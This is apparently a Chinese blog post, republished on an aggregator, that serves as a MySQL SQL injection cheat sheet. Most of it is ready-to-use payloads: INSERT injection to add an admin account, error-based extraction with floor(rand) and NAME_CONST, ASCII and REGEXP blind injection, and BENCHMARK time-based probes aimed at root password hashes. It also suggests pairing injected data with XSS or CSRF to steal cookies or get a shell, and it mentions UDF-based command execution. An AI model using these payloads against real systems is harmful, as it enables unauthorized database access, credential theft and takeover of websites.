SQL一般註入(二)
阿新 • • 發佈:2018-07-06
current csrf 註入 ascii ati cookie ble true ()
mysql一般註入(二)
1.mysql一般註入(insert、update) mysql一般請求mysql_query不支持多語句執行,mysqli可以。 insert註入多使用報錯註入! 1.如果可以直接插入管理員可以直接使用! insert into user(username,password) values(‘xxxx‘,‘ xxxx‘),(‘dddd‘,‘dddd‘)/* ‘); 2.如果可以插入一些數據,這些數據會在網頁中顯示,我們可以結合xxs和csrf來獲取cookies或getshell update註入同上 2.mysql報錯註入 1. and(select 1 from(select count(*),concat((select (select (語句)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 語句處填入一般一句,如:SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1 2. and+1=(select+*+from+(select+NAME_CONST((語句),1),NAME_CONST((語句),1))+as+x)-- 3.update web_ids set host=‘www.0x50sec.org‘ where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (語句)),1,62)))a from information_schema.tables group by a)b); 4.insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (語句)),1,62)))a from information_schema.tables group by a)b))); 3.mysql一般盲註使用ascii AND ascii(substring((SELECT password FROM users where id=1),1,1))=49 使用正則表達式 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP ‘^[a-n]‘ LIMIT 0,1) 4.mysql時間盲註 1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode(‘msg‘,‘by 5 seconds‘)),null) from (select database() as current) as tbl UNION SELECT IF(SUBSTRING(Password,1,1)=‘a‘,BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root‘ 5. mysql數據庫版本特性 1.mysql5.0以後 information.schema庫出現 2.mysql5.1以後 udf 導入xx\lib\plugin\ 目錄下 3.mysql5.x以後 system執行命令
SQL一般註入(二)